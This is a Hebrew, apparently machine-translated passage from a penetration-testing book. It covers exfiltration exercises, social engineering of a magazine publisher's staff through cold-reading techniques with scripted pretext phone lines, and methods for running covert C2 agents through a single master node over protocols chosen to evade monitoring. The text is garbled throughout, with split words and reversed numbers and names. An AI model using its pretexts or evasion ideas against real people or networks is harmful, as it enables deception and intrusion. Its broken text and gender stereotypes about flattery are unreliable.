‫הזו ה ביתה כי זה באמת העי קר ‪ .‬בתור בוד ק חדירה‪,‬י ש לי את הע בודה ה ק לה‪ .‬תו קף הוא תמידיתרון‪ .‬אני שונא‬
‫ל ק ב ל את הא חריות ל שמור ע ל ר שת מפני הת קפה; לעו לם לא הייתיי שן‪.‬‬
‫בפר ק ה בא‪ ,‬אני מד בריותר ע ל הנד סה ח ברתית ואמצעיםיצירתיים לת קוף תע שייה שונה מאוד‪.‬‬
‫‪1.‬ה קוד בדוגמה ש ל חי לוץ נתוני הדואר הא ל ק טרוני ש ל ‪Microsoft Outlook‬אינו חמ קני כפי שהואי כו ל‬
‫להיות‪ .‬איזו פונ קציה אפ שר להו סיף כדי להפוך את זה ל חמ קןיותר?‬
‫רמז‪ ,‬הר כי ב את ה קוד וראה כיצד הוא מתנהג‪.‬‬
‫‪ 2.‬בפר ק זה נגענו ‪ -SPF,‬ב ש כן הוא הנפוץ ביותר ב שימו ש‬

‫ט כנו לוגיה להגנה מפני זיוף דואר‪ .‬ט כנו לוגיה נו ספת נ קראת ‪DMARC,‬ה בנויה ע ל ג בי ‪ )SPF‬כמו גם‬
‫‪ DKIM).‬ח קור את ה ט כנו לוגיה הזו ואת הה ש ל כות ש לה ע ל זיוף דואר‪.‬‬
‫‪3.‬הדוגמאות שניתנו ל חי לוץ נתונים בפר ק זה אינן ב שום פנים ואופן‬

‫לְ הַ ׁ ְש לִים‪ .‬ש קו ל אפ שרויות א חרות ו כיצד ניתן ליי שם אותן‪.‬‬
‫אי לו מ כ שירים א חרים קיימים בר שת שניתן לג לות אותם ו לערער אותם במהירות כדי להוציא נתונים?‬
‫פר ק ‪8‬‬
‫הא ק עיתונאים‬
‫בפר ק הזה אני רוצה לד בר ע ל הנד סה ח ברתית ‪-‬די ברנו ע ל זה קצת לאורך ה ספר א ב ל‬
‫ע כ שיו כ שאנ חנו ל קראת ה סוף אני רוצה להו סיף קצת עומ ק‪ .‬במ קום ל ש חזר את מה‬
‫ש כת בתי ע ליו בע בר‪ ,‬ברצוני לדון במ סגרת חד שה לג שת להנד סה ח ברתית באמצעות‬
‫מה שאמצעי במה ואמנים א חרים מ כנים קריאה קרה‪.‬‬
‫בנו סף‪ ,‬אציג כמה ט כנו לוגיות מתפת חות ו קיימות‪ ,‬שימו שיות כא שר מ חפ שים דר כים‬
‫יצירתיותיותר ל ספ ק מ טען‪.‬‬
‫ל ב סוף‪ ,‬אציג כמה מו שגים מת קדמים בניהו ל סו כני ‪ C2‬שיהיה חיוני לה בנה ב ס בי בה‬
‫ש בה אתה צריך לנה ל מ ספר סו כנים מ ב לי לנצ ליותר מדי מרו ח ב הפ ס ש ל היעד‪.‬‬
‫ִתדר ו ּך‬
‫היעד ה לפני א חרון ב ספר זה הוא הוצאת מגזינים בינ לאומית גדו לה‪ .‬ה ח ש שות העי קריים‬
‫שהגיעו מההנה לה היו שתה ליך הערי כה והפיתו ח היו מרו ש ל מנ קודת מ ב ט בי ט חונית‬
‫וזה ע לו ל להו בי ל ל כך שתו קףיו כ ל ל שנות פר סומים לפני היציאה לדפו ס )הת קפה זו‬
‫י כו לה להיות שו ב בות ח סרת מניע או מ שהו שממו קד ע לידי פעי לים‪ ,‬ו כן זהיהיהי קר‬
‫באותה מידה לת קן(‪.‬‬
‫בית ההוצאה הזה‪ ,‬כמו ר בים א חרים‪ ,‬ה שתמ ש ב כ לי ‪ Adobe Creative Suite‬כמע ט‬
‫ל כ ל ח ל ק בתה ליך הפיתו ח ‪-‬אינדיזיין לפרי סה‪ ,‬פו טו שופ להדמיה ו כו'‪ .‬שו ב ‪ ,‬כמו הר בה‬
‫ע ס קים כא לה‪ ,‬הם היו מאוד בית ש ל אפ ל וה כ ל האנ שים ש להם ה שתמ שו במ ח ש בי מ ק‪.‬‬
‫מידע שימו שי שי ש‪.‬‬
‫במ קום להתמ קד בהת קפות גנריות ה ח לות ע ל כ ל ע ס ק‪ ,‬רציתי ל ח קור גי שה‬
‫מותאמת שתת קוף את כ לי המדיה הע שירה ש להם בדרך כ ל שהי‪ ,‬כ לומר‪ ,‬לה כני ס‬
‫את עצמי לזרימת הע בודה היומיומית ש ל ה ח ברה בצורה כזו שתצמצם כ ל ח שד‬
‫בצוות הערי כה‪ ,‬ש כנראהיהיו היעדים העי קריים‪ .‬ק טע ההת קפה ב סוף פר ק זה‬
‫מפר ט כיצד ערערתי מוצר שהם ה שתמ שו בו מדייום כדי להוריד ו להת קין סו כן ‪C2.‬‬
‫מו שגים מת קדמים בהנד סה ח ברתית‬

‫הנד סה ח ברתית היא לרו ב תרגי ל ש קדם לו מ ח קר ע ליעד‪.‬‬

‫עם זאת‪ ,‬לפעמים המ ח קר הזה לאי כו ל להיותיעי ל ב‪ 001-‬א חוז או שיהיו מ קרים ש בהם‬
‫אתה צריך ל ח שו ב ע ל הרג ליים עם זמן ה כנה מוע ט או ל לא זמן‪.‬י ש דר כים לה שיג מידע‬
‫ממ טרה בנ סי בות כא לה‪ ,‬א ב ל כדי להדגים ע ל מה אני מד בר‪ ,‬אני קודם כ ל רוצה ל שים‬
‫את זה בה ק שר‪.‬‬
‫לפני כמה שנים ה שתתפתי במ סי בת התרמה עם כמה ח ברים‪ .‬המאר ח ארגן ש קורא‬
‫טארו טיהיה נו כ ח‪ .‬אני נו טה ל ח שו ב ע ל עצמי כ ספ קן עם רא ש פתו ח ) ב ט ח‪ ,‬ה כ ל‬
‫אפ שרי א ב ל אני לא מאמין שפי סות קר טון שנד חפות ס בי ב שו ל חןי כו לות ל ספר את‬
‫העתיד(‪ ,‬א ב ל זה היה גיו ס כ ספים ו קצת כיף‪ ,‬אז ה ל כתי עם זה‪ .‬בזה א חר זה הצ טרפו‬
‫האור חים א ל ה קורא ב חדר מ בודד למ שך ‪15‬ד קות ואז ) כמע ט ל לאיוצא מן ה כ ל ל(יצאו‬
‫נדהמים מהדיו ק ש ל הת חזיות או הער כות ה חיים שנע שו‪ .‬כ שהגיע תורי‪ ,‬הת ברר מדוע‬
‫היא רצתה ל בצע את ה" קריאות" ה ל לו בנפרד‪ :‬ש לי היה גנרי ביותר וי כו ל היה ל חו ל‬
‫כמע ט ע ל כ ל א חד בגי לי‪ .‬ב קיצור‪ ,‬היא ה סתמ כה ע ל ט כני קה שידועה בתע שייה‬
‫)מדומים‪ /‬קו סמי במה‪ ,‬ת ב חרו( כ" קריאה קרה"‪ .‬במ קום להתע ס ק עם הג ברת‪ ,‬שי ח קתי‬
‫י חד‪ ,‬א ב ל ה חוויה גרמה לי ל ח שו ב‪.‬‬
‫קריאה קרה קוראים קרים מ שתמ שים במ ספר שי טות כדי לרמוז שהםיודעים הר בה‬
‫יותר ע ל הנו שא ממה שהםיודעים בפוע ל‪ .‬כפי שציינתי‪ ,‬הוא מ שמ ש לרו ב )אך לא‬
‫ב לעדי( בהתיי ח ס ל"מדיום" ו למ בצעי במה‪ .‬ח ש בתי שזהיהיה פרוי ק ט אמנותי מהנה‬
‫ל למוד ע ל ה טארו ט ו בו זמנית ל למוד את כ ל מה שאו כ ל למצוא ב קריאה קרה וגם לצפות‬
‫בהופעות ש ל הגדו לים בת חום המנ ט ליזם‪ .‬רציתי לראות אםי ש דר כים שאפ שר ליי שם‬
‫קריאה קרה לת חום הר ח ביותר ש ל הנד סה ח ברתית‪ ,‬במיו חד במ ב חני חדירה‪.‬‬
‫כת בתי ע ל הנד סה ח ברתית מ סורתיתיותר ב‪ Unauthorized Access, -‬שפור סם ע ל‬

‫ידי ‪ Wiley‬ב‪ .9002-‬ה ט כני קות הא לה קצת שונות; לה לן דוגמאות ל שי טות קריאה קרה‬
‫המ שמ שות את אמני ה במה המותאמות ל שימו ש בתר חי שים ש ל הנד סה ח ברתית‪.‬‬
‫עו בדה מ טו ש ט שת עו בדה מ טו ש ט שת היא אמירה מעורפ לת ש ס ביר להני ח שתת ק ב ל‬

‫ע לידי ה" סימן" ב ש ל האופן ש בו היא מנו ס חת‪ .‬בע ק בות ה ק ב לה הזו‪ ,‬היא מאפ שרת‬
‫ל קורא לפת ח את הדיא לוג למ שהו ספציפייותר‪.‬‬
‫קורא ע שוי לומר מ שהו כמו‪" ,‬אניי כו ל לראות ק שר עם אירופה‪ ,‬או לי ברי טניה‪ ,‬או שזה‬
‫י כו ל להיות האזורים הדרומיים ה חמיםיותר‪ .‬הרו שם הזה חז ק למדי; זה אומר לך מ שהו?"‬
‫אם ה סימן עונה מ שהו כמו‪" ,‬האם זהי כו ל ל כ לו ל את ויי ל ס?" ואז ה קוראיר חי ב ע ל כך‬
‫באומרו‪" ,‬י ש ת חו שה ק ל טית מו בה קת לר ט טים שאני ח ש‪".‬‬
‫שימו ש בעו בדה המ טו ש ט שת בהנד סה ח ברתית‬

‫לא תמיד ק ל לא חוז באנ שים מ סוימים או לג לות עם מי אתה צריך לד בר כדי ל ח לץ מידע‪.‬‬
‫אנ חנוי כו לים לה שתמ ש ב ט כני קת העו בדות המ טו ש ט שות כדי לע שות בדיו ק את זה‪:‬‬
‫" ש לום‪ ,‬אני מ קווה שתו כ ל לעזור לי‪.‬י ש לי כאן הודעה לה חזיר ט לפון ממי שהו ב ח ברה‬
‫ש לך‪ ,‬א ב ל כת ב היד ש ל ה ב חור שנתן לי את זה הוא סיו ט‪ .‬אני לא ב טו ח אם זה א לן‪ ,‬ע לי‬
‫או אנ טון‪ ...‬אני לא מצ לי ח לה בין את זה‪ .‬כ ל מה שאנייודע זה שזה ק שור ל קניית קור סי‬
‫הדר כה בתו כנת הא ב ט חה ‪Fortify‬או למיין דרי שות ה כ שרה‪.‬י ש לך מו שג מי זהי כו ל‬
‫להיות?"‬
‫הד בר המגני ב בגי שה הזו הוא שהיא הופ כת את התה ליך לעצמה‪ .‬ה ק ב לה רגי לה ל ח סום‬
‫שי חות לאנ שים מ סוימים )מאת מ כירות או מגיי סים בדרך כ ל ל(‪ ,‬א ב ל תה ליך ה ח סימה‬
‫הזה נע לם כעת‪ .‬ע כ שיו זו ר ק שי חה בין שני אנ שים‪ ,‬א חד שמנ סה לעזור ע לידי ה חזרת‬
‫שי חה מיידית ומי שהו שתפ קידו לעזור‪ .‬שימו ל ב שה שמות בדוגמה זוי כו לים להיות שמות‬
‫פר טיים או שהםי כו לים להיות שמות מ שפ חה‪ .‬אם ה ק ב לה מזהה שם שדומה לזה‬
‫שצי ט טת‪ ,‬ס ביר להני ח שתת ח בר מיד‪.‬‬
‫א חרת‪:‬‬
‫"אניי כו ל להע ביר אותך לדיי ב פי טר סון‪ ,‬הוא מ טפ ל בזה‪ ,‬א ב ל אני לאי כו ל להצי ב‬
‫אנ טון או ע לי‪".‬‬
‫במ קרה זה‪ ,‬כ ל מה שאתה צריך לומר הוא‪" ,‬פי טר סון‪ ,‬זהו‪.‬י ש לי את ה קו בץ ה לא נ כון‬
‫מו לי‪ .‬מצ טער! אתהי כו ל להע ביר אותי כדי שאו כ ל ל ברר למה הוא מת ק שר?"‬
‫הא שראי הנפ שי טרי ק א חד ש בו מ שתמ שים מדיומים כדי ל ש בור את ההתנגדות ה ספ קנית‬
‫ה ט בעית ש ל ה ל קו חות ש להם הוא לרמוז שהם ח שים ש ל ל קו חי ש ר ט ט או כי שרון נפ שי‬
‫חז ק באופן ט בעי‪ .‬זהי כו ל להיע שות במ ספר דר כים )"אני רואה את זה בהי לה ש לך" או‬
‫מה ש לאיהיה(‪ ,‬א ב ל העניין הוא להוריד את ה ספ קנות ע לידי התיי ח סות ל ל קו ח כ שווה‬
‫ו לפיו ה כ בוד הראוי‪ .‬זה טרי ק נ חמד וזה עו בד טו ב מאוד‪.‬‬
‫שימו ש בא שראי הנפ שי בהנד סה ח ברתית‬

‫אני לא אומר שאתה צריך לרמוז ש למ טרות ש לךי ש כו חות נפ שיים‪ ,‬א ב ל דרך דומה‬
‫ל ש בור התנגדות כא שר מנ סים ל ח לץ מידע היא לז כות אותם בידע או ני סיון שאין להם‪.‬‬
‫שו ב‪ ,‬ע לידי התיי ח סות למ טרה כ שווה ערך ו לפי כ בודם ש ל עמית‪,‬י ש סי כוי ג בוהיותר‬
‫שהםיתנו לך את ה סיוע שאתה צריך‪ .‬אתהי כו ל לה חדיר ד ברים ל שי חה כמו‪" ,‬אה‪,‬‬
‫ב סדר‪ ,‬אני בדרך כ ל ל לא רגי ל להתמודד עם אנ שים שיודעים ע ל מה הם מד ברים ‪-‬זה‬
‫שינוי נ חמד!"‬
‫ב ברי טניה )ו כנראה במ קומות א חרים(‪,‬י ש מע ט ד ברים שאנ שים פ חות אוה בים מא שר‬
‫להתע ס ק עם עוזרי רופא )רופאים כ ל ליים( או פ קידי ק ב לה‪ .‬אני לא רוצה לה כ לי ל‪ ,‬א ב ל‬
‫זו למע שה ק לי שאה‪ .‬הם מנ סים ל ח ל ק את ה"מומ חיות" ש להם ע ל מר שמים ועצות‬
‫רפואיות א חרות כאי לו הם רופאים בעצמם‪.‬‬
‫ציין זאת והיה מו כן ל שום מ קום אם אתה מנ סה ל ק בוע תור לרופא ש לך ב שירות‬
‫ה בריאות ה לאומי‪ .‬מצד שני‪ ,‬אם תע סו סוג כזה ש ל אי שיות ‪"-‬אתה המומ חה אז תהיתי‬
‫אם אתהי כו ל להגיד לי‪ - "...‬ותהיה לך חוויה הר בהיותר טו בה‪ .‬זה לא אותו ד בר כמו‬
‫חנופה‪ ,‬שאנ חנו מ כ סים קצת‪.‬‬
‫ת ח בו לת ה ק שת‬
‫זוהי מניית מדיום במ ס חר‪-Rainbow Ruse .‬ההיא הצהרה המז כה את ה ל קו ח בת כונת‬

‫אי שיות וגם בהיפך ש לה‪ .‬לדוגמה‪" :‬אתהי כו ל להיות אדם מאוד מת ח ש ב‪ ,‬מהיר מאוד‬
‫לעזור לא חרים גם ב לי להת ב ק ש‪ ,‬א ב לי ש מ קרים‪ ,‬אם אתה כנה‪ ,‬שאתה מזהה רצף‬
‫אנו כי בעצמך‪".‬‬
‫זה ‪win-win‬אם אי פעם היה כזה! ת ח בו לת ה ק שת מאפ שרת לך לה שמיע אמירה‬

‫ב לתי ניתנת להפר כה וזה זה ב ש ל הנד סה ח ברתית‪.‬‬
‫שימו ש ‪ -Rainbow Ruse‬ב בהנד סה ח ברתית‬

‫זה שימו שי אם אתה צריך להיראות לדעתיותר ע ל ע ס ק או תה ליך או אדם פר טי‬
‫ממה שאתהיודע בפוע ל‪ .‬זהיוצר שי חת חו לין טו בה כא שר הוא מ שו ל ב בא ס טר טגיות‬
‫א חרות ש ל הנד סה ח ברתית‪ .‬ש קו ל את הד ברים ה באים‪:‬‬
‫" קראתי מאמר ע ל ה ח ברה ש לך ר ק לפני כמהימים‪ .‬פייננ ש ל טיימ ס‪ ,‬אם אני זו כר נ כון‪.‬‬
‫ה ט ק טי קה הגדו לה ביותר ע בורי הייתה שהיא מציינת עד כמה התע שייה ש לךי כו לה‬
‫להיות מפו ל חת‪ .‬זה היה אומר שעם ח ל ק מהמת חרים ש לך‪ ,‬היו די הר בה שינויים‬
‫ותנודות ‪-‬אתהיודע‪ ,‬ארגון מ חד ש‪ ,‬מיצו ב מ חד ש‪ ,‬די בורים ע ל מיזוגים ‪ -‬בעוד ש בא חרים‬
‫הד ברים היו‬
‫באמת מאוד רגוע‪ ,‬פ שו ט מת קת ק כצפוי‪".‬‬

‫ׁ ְש טוּי וֹת‪ .‬ש טות גמורה ומו ח ל טת‪ ,‬א ב ל ה בנתם את הנ קודה‪ .‬אתהי כו ל להגיד הר בה‬
‫ו להי שמע מ ספי ק מ ש כנע ב לי לדעת כ לום‪.‬‬
‫חֲנ ו ּפָ ה‬
‫חנופה דומה לזי כוי הנפ שי‪ ,‬אך היא ר ח בהיותר בגי שתה וי ש לג שת א ליה בזהירות‪ .‬ג ברים‬
‫הם מ טרות ק לות ל חנופה‪ ,‬במיו חד מצד נ שים‪ .‬מצד שני‪ ,‬נ שים זו כות ) בגדו ל( לא כ ל כך‬
‫ב ק לות למניפו לציות ע לידי חנופה‪ ,‬ש כן הן נ חו שותיותר מפניה‪ .‬עם זאת‪ ,‬מעניין לציין‬
‫שהר בהיותר נ שים רואות מדיומים ו קוראות טארו ט מא שר ג ברים‪ .‬ב כ ל מ קרה‪ ,‬זוהי‬
‫ט כני קהיעי לה ביותר ב קריאה נפ שית‪.‬‬
‫"אתהיודע איך להיות ח בר טו ב‪ .‬אני רואה שאתה בעצם אדם טו ב‪ ,‬אדםי שר‪ ,‬שרוצה‬
‫לע שות את הד בר הנ כון"‪.‬‬
‫"אתה חם ואוה ב‪".‬‬
‫"י ש לך נ שמה טו בה‪".‬‬
‫"אתה חו ש ב עצמאי‪".‬‬
‫זה מ סוג הד ברים ש כו לם אוה בים ל שמוע‪ .‬כמו בן‪ ,‬ל"מדומים" ק ליותר מזה‪ ,‬כי הםי כו לים‬
‫" לזהות" ד ברים כא לה מ ב לי ל ספ ק ה ק שר ו במ טרה שו ב ל ש בור את ה ספ קנות ו ל טפ ח‬
‫קר בה‪.‬‬
‫שימו ש ב חנופה בהנד סה ח ברתית אם אתה מת ק שה להתמודד עם מדיניות הא ב ט חה‬

‫הארגונית בזמן שאתה מנ סה לר כו ש מידע‪ ,‬היה נ חמד והראה עד כמה אתה מעריך‬
‫את העו בדה שהם מתיי ח סים ברצינות לא ב ט חת מידע‪" :‬אני חיי ב לומר שאני חו ש ב‬
‫שהד ב קות ש לך למהות מהי א ב ט חה הוא באמת במ קום‪ .‬האיזון הנ כון בין תה ליך‬
‫פונ קציונ לי לא ב ט חה אף פעם לא ק ל‪ ,‬א ב ל אני חו ש ב ש שפ טת את זה הי ט ב ‪ -‬כנראה‬
‫קצתיותר טו ב מרו ב ה ח ברות במגזר ש לך‪ .‬לפ חות מני סיוני"‪.‬‬
‫זה מ כונה גם ב קריאות נפ שיות כ" ש ב חת הדאגה" או ספ קנות מתגמ לת פ סי כו לוגית‪ .‬אנ שי‬
‫א ב ט חה מודעיםיותר מדי ל כמה ק שה לאזן בין תה ליך פונ קציונ לי לא ב ט חה ו בוודאי‬
‫יערי כו מי שהו ע ל כך שהוא שם ל ב שהוא עו שה ע בודה טו בה‪ .‬ר ק א ל תיראה כמו נ שי קה‪.‬‬
‫הצהרת ז'א ק‬
‫זהו א חד מעניין‪ .‬הוא נ קרא ע ל שמו ש ל ז'א ק ב" כפי שאתה אוה ב את זה" ש ל שיי ק ספיר‪,‬‬
‫שנואם את הנאום המפור סם " ש בע עידן האדם"‪ .‬רו ב האנ שים בי סודו זהים‪.‬י ש להם‬
‫את אותן חוויות באותן ת קופות ב חייהם‪ ,‬אותם ניצ חונות‪ ,‬הי שגים‪ ,‬מ ש ברים וא כז בות‪ .‬זה‬
‫לא מ שנה אם ה ל קו ח לו ב ש ח ליפה חדה ורו ל ק ס או מתאפיין בת סרו קת פאנ קית וצמיד‬
‫ני טים‪ .‬זו ה סי בה שהד בר הרא שון שמדיוםי שא ל אותך הוא הגי ל ש לך‪.‬‬
‫הדוגמה ה באה היא מ שהו שיתאים למי שהו ב סוף שנות ה‪ 03-‬או המו קדמות ש ל שנות‬
‫ה‪ 04-‬ל חייו‪" :‬תהיו כנים עם עצמ כם‪ :‬אתם מ ב לים הר בה זמן לא חרונה ב שא לות מה‬
‫קרה ל כ ל ה ח לומות הא לה שהיו ל כם בימי כם הצעירים ‪ -‬שאיפות ו תו כניות שפעם היו‬
‫ח שו בות לך‪.‬י ש בך ח ל ק שרוצה פ שו ט ל ב ט ל ה כ ל‪ ,‬לצאת מהת לם ו להת חי ל מ חד ש ‪-‬‬
‫הפעם לע שות ד ברים בדרך ש לך"‪.‬‬
‫זה כמו להגיד למת בגר ש לפעמיםי ש להם מצ ב רו ח; זה כמו לירות דגים ב ח בית‪.‬‬
‫שימו ש בהצהרת ז'א ק בהנד סה ח ברתית‬

‫לא ר ק חייהם ש ל אנ שים צפויים‪ ,‬א לא תו ח לת ה חיים ש ל ע ס ק‪:‬‬
‫"אני עו ק ב א חרי הע ס ק ש לך מאז הימים הרא שונים ‪-‬ה חופ שי ל כו לם כ שה כ ל היה עניין‬
‫לתפו ס נת ח שו ק‪ ,‬לה שיג דרי סת רג ל‪ ,‬ואז ה כ ל היה עניין ש ל אי חוד‪ .‬ה כ ל ב בע לות ‪HP‬‬
‫ו‪ MBI-‬כיום‪ ,‬לא? סיפור רגי ל‪ ,‬הדגים הגדו לים מתמזגים לדגים גדו ליםיותר כדי לצמצם‬
‫ע לויות ו לצמצם מרוו חים ‪ -‬בני סיון לה ב טי ח הי שרדות‪ ,‬באמת ‪ -‬ור ק כמה עצמאים‬
‫נ שארים ל טפ ל במגזרי 'ני שה' מומ חים"‪.‬‬
‫ניתן להתאים הצהרות מ סוג זה לפי הצורך‪ .‬הם שימו שיים ל בניית קר בה והדגמה‬
‫שהמהנד ס ה ח ברתי והמ טרה נמצאים " באותו עמוד" וצעדו באותם נתי בים‪.‬‬
‫הצהרת בארנום‬
‫‪ PT‬בארנום היה אי ש ראווה ואימפר סיו אגדי שנאמר שי ש לו "מ שהו לרצות את כו לם"‪.‬‬
‫כ כזה‪ ,‬הצהרת בארנום היא כזו שנועדה להי שמע נ כון ל כו לם‪ .‬הצהרות א לו אינן צרי כות‬
‫להיות מ חמיאות ב ט בען‪ .‬לדוגמה‪:‬‬
‫"מדי פעם הת קוות והמ טרות ש לךי כו לות להיות די לא מציאותיות‪".‬‬

‫"מדי פעם הת קוות והמ טרות ש לךי כו לות להיות די לא מציאותיות‪".‬‬

‫"י ש לך צורך עז שאנ שיםיאה בו אותך וי כ בדו אותך‪".‬‬
‫כמו בן‪ ,‬הםי כו לים לה חמיא‪:‬‬
‫“אתה הוגה דעות עצמאי ומ קורי; אתה לא מ ק ב ל ר ק את מה שאנ שים אומרים לך‬
‫להאמין‪".‬‬
‫זהו עוד טרי ק מדיום ק לא סי להיראות ב קיא בנו שא תוך הצהרה שי כו לה להיותי שימה‬
‫כמע ט ע ל כ ל א חד‪.‬‬
‫שימו ש בהצהרת ברנום בהנד סה ח ברתית כמו הצהרת ז'א ק‪ ,‬להצהרת ברנוםי ש‬
‫יי שומים הר בה מע בר לאנ שים‪ .‬לדוגמה‪" :‬די ברתי עם ח בר ותי ק ש לי ‪ -InfoSec‬ב ב לונדון‬
‫ב ש בוע שע בר‪ .‬הוא ע בד ב ש בי ל כם‪ ,‬והוא אמר שהע ס ק שם‪ ,‬אם אתםיודעים איפה‬
‫למצוא אותו‪ ,‬א ב ל ה בעיה היא לגרום לו ל ש לם‪ .‬שו ליים ד קים ממ שי כים להיות ד קים‪,‬‬
‫ואתה באמת צריך ל ל כת ל טוו ח ארוך כדי שזהיע בוד‪ .‬או לי זה ת קף להת ק שרויותייעוץ‬
‫מ סוימותיותר מא חרות"‪.‬‬
‫‪ C2‬ח ל ק ‪ VIII:‬מו שגים ני סויים ב‬

‫פי קוד ו ב קרה‬
‫עד כה‪ ,‬בד קנו מ ספר דר כים בהן ניתן לת חז ק ‪ C2‬ע ל ג בי ת שתית היעד‪ .‬עם זאת‪ ,‬ב כ ל‬
‫תר חי ש עד כה ‪ -‬ל לא ק שר למימו ש ‪-‬המוד ל תמיד ה סתמך ע ל כך ש ל כ ל צומת או סו כן‬
‫ב ש לי טתנוי ש ערוץ ‪ C2‬מ ש לו‪ .‬זה לא תמיד מתאים ו לא ח כם‪.‬‬
‫במצ ב בו תצ טר כו ל ש לו ט או ל כוון מ ספר מאר חים‪ ,‬הד בריגרום לתע בורת ר שת מוגזמת‬
‫)או ל כ ל הפ חות‪ ,‬מ שואה מוגזמת ו ל כן חי בורים( מ חוץ לר שת‪ .‬בנ סי בות כא לה‪ ,‬כדאי‬
‫ל ש קו ל מוד ל ח לופי שמא חד את המאר חים ב‪ 2C-‬ש לך לערוץ ניהו ל א חד‪.‬‬
‫כפי שתראו‪ ,‬זה לא ק ל כמו שזה נ שמע‪ .‬אין‪ ,‬כמו בן‪ ,‬גי שה "ה טו בה ביותר" א חת לניהו ל‬
‫סו כנים מת קדם‪ ,‬אך בפר ק זה נ ש קו ל שני פתרונות אפ שריים‪ .‬זה שאתה לו ק ח ת לוי‬
‫במידה ר בה בנ סי בות המ שימה ומה המתאים ביותר בהת ח ש ב בידע ש לך ע ל‬
‫האר כי ט ק טורה ש ל ר שת היעד‪ .‬עם זאת‪ ,‬ב שני המ קרים המ טרה היא ל ב חור בא חד‬
‫מ סו כני ‪ C2‬כמא ס טר ו לתע ל את כ ל הנתונים דרך אותו צומת‪.‬‬
‫תר חי ש ‪1:‬ניהו ל סו כן מודרך ‪C2 Server‬‬

‫הדרך ה ק לה ביותר לה שיג מ טרה זו היא לאפ שר ל שרת ‪ C2‬לה קצות תפ קידים ל סו כני‬
‫‪ C2.‬ל סו כן הרא שוני שא ליוי ש למדודיו קצה תפ קיד המא ס טר‪ ,‬כפי שמוצג באיור ‪8.1.‬‬
‫איור ‪ 8.1:‬מ שואה רא שונית מ סומנת כצומת מא ס טר‪.‬‬

‫כ ל המ שואות ה באותי ק ב לו הוראות לתע ל את התע בורה ב חזרה דרך צומת‬
‫ה סו כן הרא שי הזה‪ .‬ראה איור ‪8.2.‬‬
‫איור ‪ 8.2: C2‬מ שתמ ש ב‪ retsaM-‬ע בור קי שוריותיוצאת‪.‬‬

‫האופן ש בו צמתים מת ק שרים ביניהם באמצעות מ ק טע הר שת המ קומית הוא עניין‬
‫ש ל העדפה אי שית‪ ,‬ש כן למע שה ניתן ל שנות או להר חי ב כ ל פרו טו קו ל נפוץ בר שתות‬
‫פנימיות כך שי כ לו ל מ טען ‪ C2, ICMP, SNMP‬ו כמו בן ‪HTTPS.‬‬
‫א לו הן ש לו ש דוגמאות ברורות בתר חי שים ש בהם שימו ש מופרז בתע בורת ‪ SSH‬פנימית‬
‫בין ת חנות ע בודה ע שוי להי ח ש ב ח שוד ע לידי ני טור ר שת אגר סי בי‪ .‬ה כ ליאפ שר לך‬
‫ל שאת נתונים שרירותיים‪HTTPS .‬אינו מומ לץ ל שאת נתוני ‪ C2‬מ חוץ לר שת‪ ,‬לאור‬
‫ה בדי קה הפו טנציא לית הנו ספת שפרו טו קו ל זהי ק ב ל מא ב ט חה ברמת הג בו ל‪ .‬עם זאת‪,‬‬
‫ה שמיים הם הג בו ל אם אתה רוצה להיותיצירתי ו להי שאר מת חת לרדאר‪ .‬כרגע אני‬
‫מתנ סה בהודעות ‪-OSPF‬ו ‪ RIP‬מזויפות )מער כות זיהוי חדירה לאיתער בו בפרו טו קו לי‬
‫ניתו ב פנימיים(‪.‬‬
‫ה בעיה בגי שה זו היא ש כ ל ת שתית ‪C2‬הופ כת להיות ת לויה בצומת סו כן א חד‪ .‬ניתן‬
‫לה קצות מ ספר סו כנים בתר חי ש כ ש ל‪ ,‬א ב ל זה בדרך כ ל ל מור כ ב מיותר‪ .‬פתרון פ שו ט‬
‫למ קרה שה סו כן הרא שי ש ל ‪ C2‬מת ) כ לומר‪ ,‬מתג לה או שהמ כונה כ בויה או מופע לת‬
‫מ חד ש( הוא ליי שם פונ קציית פ ס ק זמן המ בו ס סת ע ל כ ש ל ת ק שורת ש ל פר ק זמן‬
‫שרירותי )ראה איור ‪8.3) .‬‬
‫איור ‪ 8.3:‬פ ס ק זמן בצומת הרא שי מ סמן שהוא כ בר לא מתפ קד או שהמאר ח‬

‫כ בוי‪.‬‬
‫ב ש ל ב זה‪ ,‬שרת ‪C2‬יני ח שהצומת מו ש בת באופן זמני או ק בוע וי קצה את התפ קיד ש ל‬
‫מנה ל סו כן ‪ C2‬למאר ח א חר‪.‬‬
‫זהינ חה את הע בדים הנותרים לנת ב דרך המאר ח ה חד ש הזה כמו קודם )ראה איור‬
‫‪8.4).‬‬
‫איור ‪ 8.4:‬שרת ‪ C2‬מנה צומת מא ס טר חד ש‪.‬‬
‫תר חי ש ‪2:‬ניהו ל סו כני ‪ C2‬חצי או טונומי‬

‫תר חי ש ‪2:‬ניהו ל סו כני ‪ C2‬חצי או טונומי‬

‫בעוד שהתר חי ש ה קודםיעי ל ברו ב המ קרים‪,‬יית כנו נ סי בות ש בהן תרצה להעני ק‬
‫לצמתים ‪ C2‬ש לךיותר או טונומיה ב ב חירת צומת מא ס טר )או צמתים( מ ש להם‪ ,‬בהתאם‬
‫לגורמים מ סוימים ספציפיים ל ס בי בת היעד‪ .‬ניתן לה שתמ ש ב ח בי לת שידור פ שו טה או‬
‫ב ח בי לת ‪ ARP‬מזויפת כדי לאפ שר לצמתים שאינם מודעים לנו כ חות זה לת ק שר ב ק טע‬
‫ר שת מ קומית )ראה איור ‪8.5).‬‬
‫איור ‪ 8.5:‬סו כנים ממנים את המא ס טר ש להם‪.‬‬

‫לא חר שהו קצה צומת רא שי ש ל סו כן‪ C2 ,‬מופע ל לפי תר חי ש ‪)1‬ראה איור ‪8.6).‬‬
‫איור ‪8.6:‬המא ס טר מתפ קד כ שער לצמתים א חרים כמו קודם‪.‬‬

‫עם זאת‪ ,‬הה בד ל העי קרי הוא שהצמתים לא צרי כים להמתין עד להתר ח שות פ ס ק זמן‬
‫מא ס טר ש ל סו כן כדי לערוך ב חירות חד שות ש בהן צומת חד ש נ ב חר במידת הצורך או‬
‫שהנו כ חי נ שמר‪ .‬זהי כו ל להתר ח ש במרוו ח מוגדר מרא ש או בין זמני ש ק ט בפעי לות ‪C2‬‬
‫)ראה איור ‪8.7).‬‬
‫איור ‪ 8.7:‬ב חירות נו ספות מת קיימות לפי הצורך‪.‬‬

‫הערות ע ל הי ח סים בין סו כני אדון וע בדים‪ .‬ל סו כן הרא שיי ש מ ספר ת חומי א חריות‪ ,‬ל לא‬
‫ק שר לתר חי ש שת ב חר ליי שם‪:‬‬
